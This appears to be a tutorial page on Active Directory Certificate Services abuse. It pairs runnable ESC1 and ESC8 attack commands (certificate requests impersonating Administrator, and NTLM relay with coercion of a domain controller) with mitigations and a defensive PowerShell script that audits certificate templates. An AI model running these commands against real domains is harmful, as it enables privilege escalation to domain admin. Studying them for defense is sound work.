AD CS Abuse

Exploitation
A06

Active Directory Certificate Services (AD CS) is Microsoft's PKI implementation. Misconfigurations in certificate templates and enrollment services can allow attackers to escalate privileges from a standard user to Domain Admin, often with persistence.

Tools of the Trade

Certify

C# tool to enumerate and abuse AD CS (the "BloodHound" of AD CS).

Coercer

Python tool to coerce authentication (useful for ESC8).

Certipy

Python equivalent of Certify/Rubeus for Linux/Impacket users.

PKINITtools

Tools for interacting with Kerberos PKINIT (gettgtpkinit.py).

ESC1: Misconfigured Certificate Templates

ESC1 occurs when a certificate template lets low-privileged users enroll and supply their own SubjectAltName (SAN). An attacker can then request a certificate for any user (e.g., Administrator) and use it to obtain a TGT for that account.

1. Enumeration

Find vulnerable templates: look for EnrolleeSuppliesSubject: True combined with a Client Authentication EKU.

Certify (Windows):

```powershell
.\Certify.exe find /vulnerable
```

Certipy (Linux):

```bash
certipy find -u user@corp.local -p password -dc-ip 10.10.10.1 -vulnerable
```

2. Exploitation

Request a certificate for the Domain Administrator.

Certify:

```powershell
.\Certify.exe request /ca:DC01.corp.local\corp-DC01-CA /template:VulnerableTemplate /altname:Administrator
```

Certipy:

```bash
certipy req -u user@corp.local -p password -ca corp-DC01-CA -target DC01.corp.local -template VulnerableTemplate -upn Administrator@corp.local
```

3. Authenticate (Pass-the-Certificate)

Convert the certificate (.pfx) to a TGT and NTLM hash.

Rubeus:

```powershell
.\Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /password:cert_password /ptt
```

Certipy:

```bash
certipy auth -pfx administrator.pfx -dc-ip 10.10.10.1
```

ESC8: NTLM Relay to AD CS HTTP Endpoints

If the AD CS server has the "Certificate Authority Web Enrollment" role installed, it exposes an HTTP endpoint that accepts NTLM authentication. By default this endpoint has no NTLM relay protection (no signing or MIC applies to HTTP). An attacker can coerce a Domain Controller into authenticating to them (via PetitPotam/Coercer) and relay that authentication to the AD CS HTTP endpoint to obtain a certificate for the DC's machine account.

1. Identify Web Enrollment

Check for HTTP endpoints on CAs.

```bash
certipy find -u user@corp.local -p password -dc-ip 10.10.10.1 -vulnerable
```

Look for "Web Enrollment" in the output.

2. Setup Relay

Configure ntlmrelayx to target the CA's HTTP endpoint and use the "DomainController" template (or "Machine").

```bash
impacket-ntlmrelayx -t http://10.10.10.5/certsrv/certfnsh.asp -smb2support --template DomainController --adcs
```

3. Coerce Authentication

Force the Domain Controller (10.10.10.1) to authenticate to your attacker machine (10.10.10.99).

```bash
python3 Coercer.py -t 10.10.10.1 -l 10.10.10.99
```

If successful, ntlmrelayx outputs a base64-encoded certificate for the Domain Controller machine account. You can use this to DCSync.

Defense & Mitigation

  • Disable Unused Templates: Remove templates that are not strictly needed.
  • Restrict Enrollment: Ensure "Manager Approval" is required for sensitive templates.
  • Remove "Enrollee Supplies Subject": Do not allow users to specify SANs in templates.
  • Disable HTTP Web Enrollment: If not needed, remove the role. If needed, enable Extended Protection for Authentication (EPA) and require SSL.
  • Monitor: Watch for Event ID 4886 (Certificate Request) and 4887 (Certificate Issued) where the requester or the requested subject/SAN is a sensitive account.
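To act on the template-related mitigations above, a defender needs the list of published templates that match the ESC1 conditions from the enumeration step (enrollee supplies subject, client-authentication EKU, no manager approval, broad enroll rights). The following audit script is an added example, not from the original page or from any of the listed tools; it assumes the RSAT ActiveDirectory module and uses the well-known SIDs for Everyone, Authenticated Users, Users and Domain Users as the "broad" principals, which you should extend with any other wide groups in your forest.

```powershell
# Added audit example (not from the page): list published templates matching the ESC1 pattern.
# Assumes RSAT ActiveDirectory module; group SIDs are the well-known defaults (extend for your forest).
Import-Module ActiveDirectory
$configNC = (Get-ADRootDSE).configurationNamingContext
$pksBase  = "CN=Public Key Services,CN=Services,$configNC"

# Flag bits, EKU OIDs and the Certificate-Enrollment right GUID as documented in MS-CRTD / MS-ADTS
$CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x1   # msPKI-Certificate-Name-Flag
$CT_FLAG_PEND_ALL_REQUESTS         = 0x2   # msPKI-Enrollment-Flag: CA manager approval required
$AuthEkus   = '1.3.6.1.5.5.7.3.2', '1.3.6.1.4.1.311.20.2.2', '1.3.6.1.5.2.3.4', '2.5.29.37.0'
$EnrollGuid = [Guid]'0e10c968-78fb-11d1-a1d1-00c04fc2a4c5'
# Everyone, Authenticated Users, BUILTIN\Users, Domain Users
$BroadSids  = 'S-1-1-0', 'S-1-5-11', 'S-1-5-32-545', "$((Get-ADDomain).DomainSID.Value)-513"

# Only templates published on an enrollment service (CA) can actually be requested
$published = Get-ADObject -SearchBase "CN=Enrollment Services,$pksBase" `
    -LDAPFilter '(objectClass=pKIEnrollmentService)' -Properties certificateTemplates |
    ForEach-Object { $_.certificateTemplates }

# True if a broad principal holds the Enroll extended right (or GenericAll) on the template
function Test-BroadEnroll([System.DirectoryServices.ActiveDirectorySecurity]$Acl) {
    $extRight = [System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight
    $allRight = [System.DirectoryServices.ActiveDirectoryRights]::GenericAll
    foreach ($ace in $Acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        try { $sid = $ace.IdentityReference.Translate([System.Security.Principal.SecurityIdentifier]).Value }
        catch { continue }   # unresolvable (e.g. deleted) principal: skip
        if ($BroadSids -notcontains $sid) { continue }
        $enroll = (($ace.ActiveDirectoryRights -band $extRight) -ne 0) -and
                  ($ace.ObjectType -eq $EnrollGuid -or $ace.ObjectType -eq [Guid]::Empty)
        if ($enroll -or (($ace.ActiveDirectoryRights -band $allRight) -eq $allRight)) { return $true }
    }
    return $false
}

Get-ADObject -SearchBase "CN=Certificate Templates,$pksBase" -LDAPFilter '(objectClass=pKICertificateTemplate)' `
    -Properties msPKI-Certificate-Name-Flag, msPKI-Enrollment-Flag, msPKI-RA-Signature, pKIExtendedKeyUsage, nTSecurityDescriptor |
  ForEach-Object {
    $t        = $_
    $supplies = ($t.'msPKI-Certificate-Name-Flag' -band $CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT) -ne 0
    $approval = ($t.'msPKI-Enrollment-Flag' -band $CT_FLAG_PEND_ALL_REQUESTS) -ne 0
    $noSigs   = [int]$t.'msPKI-RA-Signature' -eq 0      # no authorized signatures required
    $authEku  = @($t.pKIExtendedKeyUsage | Where-Object { $AuthEkus -contains $_ }).Count -gt 0
    if (($published -contains $t.Name) -and $supplies -and -not $approval -and $noSigs -and $authEku -and
        (Test-BroadEnroll $t.nTSecurityDescriptor)) {
        [pscustomobject]@{ Template = $t.Name; Fix = 'Clear "Supply in the request", require manager approval, or restrict Enroll' }
    }
  }
```

Each template returned should be remediated with one of the listed fixes and re-run until the script returns nothing.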